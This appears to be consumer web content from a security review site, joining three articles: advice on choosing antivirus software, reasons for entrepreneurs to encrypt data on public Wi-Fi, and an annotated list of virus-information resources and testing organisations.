Does a standalone antivirus program offer enough protection or should you pair it up with a firewall, or go for a full internet security suite?

Such an important question is not one we can answer on your behalf – the answer lies in how you use your computer, laptop or other device.

If you are an occasional surfer who never visits any websites that could be deemed as questionable then you will still need some security in order to protect yourself from the possibility of accidentally visiting an otherwise legitimate site that has been hacked and injected with malware.

You will also need to think about the risk of installing malware from borrowed CDs, DVDs and USB sticks, as well as the threat posed by malicious email attachments.

Overall though, a small, free antivirus program may serve your needs well enough.

On the other hand, heavy surfers, those of you banking online, or making web purchases with your credit cards, will probably appreciate the extra protection afforded by having additional security features in your arsenal.

If this sounds like you, we would definitely recommend a firewall and anti-spyware as a minimum starting point and would also suggest that you may wish to look into full internet security suites which often cost just a little more than an antivirus program but offer all these features and many more besides.


Does paying for your antivirus program guarantee that you’ll receive adequate support from the vendor?

In a nutshell: no.

Our experience of antivirus vendors tells us that customer support is not always proportional to the price you pay for the product.

While it is certainly true that the companies offering free AV products tend to offer less support in the first place, it is also true that handing over your hard earned cash may not earn you the right to rely upon 24/7 support via phone or email.

Our reviews will give you a good idea of both the level of support you should expect to receive with any given product, and the ease with which you can expect to call upon it when required.

Will your antivirus program of choice give you the level of protection that you need?

That is, of course, the million dollar question.

There are many factors to consider when choosing an antivirus program, including:

  • Ease of use
  • Level and availability of support
  • Minimum system requirements
  • Additional features, such as anti-spyware, online banking protection, firewalls, social media plugins, phishing protection and more

But the most important consideration for most of you will be whether or not it can get the main job done – protecting your computing device from the numerous threats it could face as you traverse the internet.

With that in mind, our antivirus reviews will take a close look at just how effective each program is.

Own an older machine? Will your antivirus program even work and, if so, will it render your computer unusable for anything else while running a scan?

As technology marches on at what appears to be an ever-increasing pace it’s easy to forget that not everyone has the latest processors or the fastest solid state drives in their desktop PCs.

And why should they?

Unless you are gaming (and if you are, you may want to read our reviews to see how your preferred antivirus program deals with that situation) or editing videos, then much older machines are still perfectly adequate for the majority of tasks.

Email, word processing, web surfing and online banking are all quite possible on PCs manufactured in the last decade.

But how old is too old for the latest antivirus protection?

Well, the good news is that the vast majority of security software will run on very low spec machines so the minimum system requirements may not be an issue for you.

But you will want to check, just to be certain.

There’s nothing worse than a program that doesn’t work, or one that slows your machine to a total standstill when you have work to do, is there?

Read our reviews!

So, which antivirus program is the right one for you and your family?

The simple answer is that there is no simple answer – everyone’s needs are different and, for the most part, there certainly isn’t a wrong choice (the major vendors’ products may vary in effectiveness and usefulness but they all get the job done to some degree or another).

That’s why picking the right one for you can be so damned hard.

While some people will fall back on the strangest of reasons for purchasing a particular product – yes, some of those boxes do look nice and, yes, it can be convenient to stick with the antivirus program that came with your computer, the truth is that your decision deserves a greater level of consideration than that.

If you want a program that will give you the level of protection you need and deserve then you need to pick one that suits you as an individual, that works hand in hand with the type of computing you do, and that isn’t too demanding for the machine you are installing it on.

You’ll also want a program that’s easy to use and value for money – after all, why pay if a free version is good enough?

Equally, why go cheap if a far better level of protection can be had inexpensively?

If you need help walking through this minefield then trust in us – we’ve reviewed all the best antivirus programs and our expert reviews will tell you everything you need to know before picking the right software to match your needs.

4 Reasons Encryption Is An Entrepreneur’s Best Friend


If you’re an entrepreneur and you use public Wi-Fi, you’re an easy target for hackers looking for data to steal. Public Wi-Fi today is usually unencrypted, which means it’s open season for hackers.

Encryption is vital to your privacy and data security, which translates to maintaining your business without having your bank accounts and proprietary information stolen.

Encryption in a nutshell

Encryption transforms data into an unreadable form that can only be decrypted with a special key. An encrypted file, when opened, will look like gibberish until it’s properly decrypted.

If you haven’t given genuine consideration to encrypting your data, here are 4 reasons you should:

1. If you use public Wi-Fi, your data is at risk

When your Wi-Fi network is password protected, that password protects the websites you visit from being discovered by other people. Without a password, hackers can access the websites you visit, along with anything you type into unencrypted web forms.

Public Wi-Fi has never been completely secure, although in years past it was commonly protected by a temporary password that would only be provided with a purchase. This type of protection made it harder for hackers to gain access to information being sent across the network.

You can’t control whether or not public Wi-Fi is encrypted, but you can take your own precautions to protect yourself, like using a VPN to route your traffic through an encrypted server. While a VPN isn’t a guaranteed solution, it does decrease your risk of getting hacked.

2. You can’t rely on encrypted websites

Just because a website is encrypted doesn’t mean you are automatically protected anytime you visit that site. For example, your bank’s website is probably encrypted, but if you’re using an unencrypted Wi-Fi network to access your bank’s website, your login credentials could easily be stolen as you type them in.

Hackers can also hijack HTTP connections and create fake HTTPS links that you think are real, allowing a man-in-the-middle attack to intercept what would otherwise be a secure browsing experience.

If your computer is infected with a keystroke logger, anything you type into your computer will be transmitted to the hacker, even if you’re connected to the most secure network in the world.

If you’re on an unencrypted network, like the ones at Starbucks, someone could sit in the lobby with a simple tool and hijack your browsing session.

The only way to prevent this is to keep your data encrypted on your computer, or better yet, don’t use public Wi-Fi networks when conducting your business.

3. Emails can be hijacked

Encrypting emails is especially important because that’s where most company communications take place. Credit card numbers and company secrets are commonly exchanged through email, and if anyone is snooping on your email conversations you can guarantee that information will fall into the wrong hands.

Some businesses only require employees to encrypt emails they consider to be private, but employees might misjudge what’s considered private. That’s why you should install a program on your company’s email server that encrypts every email, and not allow staff to encrypt selectively.

4. Not all hotspots are authentic

Hackers often create fake hotspots to trick people into connecting to what they think is their usual coffee shop Wi-Fi network. For example, they might bring a device into Starbucks and set up a fake hotspot called “Starbucks.” If you’re savvy enough to remember how the real network’s name is spelled, you won’t get caught in this trap.

Real networks are prone to becoming compromised, though, so even connecting to a genuine hotspot could be dangerous.

Data encryption isn’t just for top-secret files created by the government. There are real threats out there, and your data in any form should be encrypted at its destination as well as in transit.

Computer Virus Resources: A Big List of Tools and Guides


Below you’ll find a handy list of resources that will explain what computer viruses are, how to prevent them, how to get rid of them, and where you can learn more about computer viruses.

Guides About Computer Viruses

If you’re not familiar with computer viruses and want to know more, or you’re wanting to expand your current knowledge, these resources will provide you with in-depth information about them. From how to detect a virus on your computer to what the most common types of viruses are, these guides have all bases covered:

TechTarget.com – To get you started, here’s a handy definition of “computer virus.” You’ll also find some information on the different types of viruses (e.g. macro viruses, file infectors, and overwrite viruses); an intriguing history of computer viruses; and some of the world’s most famous viruses. You might also want to check out their malware guide, which provides you with even more in-depth information.

US-Cert.gov – Produced by the United States Computer Emergency Readiness Team, this information introduces you to viruses and how you can avoid them.

Dummies.com – This resource provides you with the ultimate cheat sheet for tackling computer viruses. It explains how to configure your antivirus software, how to scan for viruses on your computer, and how to operate your computer safely. It also includes a section on what to do if your computer does get a virus and how best to handle this.

LiveScience.com – Discussing the three most common types of computer viruses, this resource delves into trojans, botnets, and scareware. It goes into detail about each of these while also providing you with advice from some industry-leading experts.

Comparitech.com – To tackle computer viruses it’s imperative that you’ve got antivirus software installed on your computer. And this great, jargon-free guide explains why you need antivirus software and what you need to look out for when buying it.

BBC Bitesize – Even though this resource is aimed at kids, it still provides a great overview of what viruses are, what can happen if your computer gets one, and what the most common types of malware are. Perfect for educating the kids on what to look out for when they’re on the computer.

Choosing Tools that Will Protect and Remove Computer Viruses

To help you find the most effective antivirus software for your computer, these resources provide useful advice on what features to look out for:

Comparitech.com – Providing a list of the best antivirus protection for 2017, Comparitech has done all the hard work for you by reviewing each provider in detail. They’ve looked at various criteria, including value for money, effectiveness, and additional features. You can read in-depth reviews on each of these providers before making your purchase.

US-Cert.gov – Here you’ll find some more information about what antivirus software does, how it works, and how it will respond to threats.

SE Labs – Founded by security expert Simon Edwards, Chairman of the Board of the Anti-Malware Testing Standards Organization, this company provides independent testing of antivirus programs. Consumers can sign up to receive their latest reports here.

Databases About Viruses

To stay alerted to potential threats, you may want to check on these databases which provide the latest real-time updates on existing and emerging threats and vulnerabilities:

WildList.org – WildList Organization International aims to provide comprehensive, timely, and accurate information to product developers and users about computer viruses that are “in the wild.” The list is produced by over 40 recognized volunteers and is free for all to view.

Symantec.com – As a leader in cyber security, this is a great place to visit if you want to hear about the latest threats. You can find up-to-date information about emerging threats, emerging risks, and vulnerabilities.

McAfee.com – On this website you’ll find a list of recent threats, which have been assessed to establish what type of risk they are (i.e. low or high). You can also find a global virus map and a list of recent virus hoaxes.

AVG.com – Learn about the top threats through AVG Threat Labs’ encyclopedia of viruses. Here you can learn more about specific viruses (e.g. Trojan Horse) while also seeing what threats have been detected today and what types of malware have been found.

Additional Resources and Organizations

CERT – If you want to stay up to date with all the latest developments in Internet security, including the most recent computer virus threats, this is your go-to place. Run as part of the Software Engineering Institute, CERT aims to provide cutting-edge information, advice, and training to continually develop and improve cybersecurity.

AAVAR.org – This nonprofit organization is based in Asia and is made up of a number of experts from all over the world. Their aim is to prevent the spread and damage of malware while also raising users’ awareness of computer viruses across the globe.

Apple.com – For Mac users, this is a must-see resource as it provides you with added details on the type of safety that’s built into Macs. It’s also a good place to keep up to date with the latest advancements and whether there are any updates you need to do.

Microsoft.com – Here you can learn about Microsoft’s latest investments, what they’re doing to make their systems safe, and the security methods that are built into their systems. If you’re a business, you can also perform a security risk assessment, which helps you to see the cost implications of a security threat and what measures you need to take to protect your company.

AV-TEST.org – As an independent service provider, AV-TEST carries out research that enables it to find the latest threats and analyze them before informing customers of its findings. Stay up to date with its latest tests through the website, narrowing your search down by the platform you are interested in – e.g. Android; Windows (business or personal); and MacOS.

VirusBulletin.com – With this publication you can find out the latest techniques, developments, and threats to online security, while also hearing the opinions of industry experts. Virus Bulletin also tests anti-malware software, so you can read about their certification schemes and what these involve.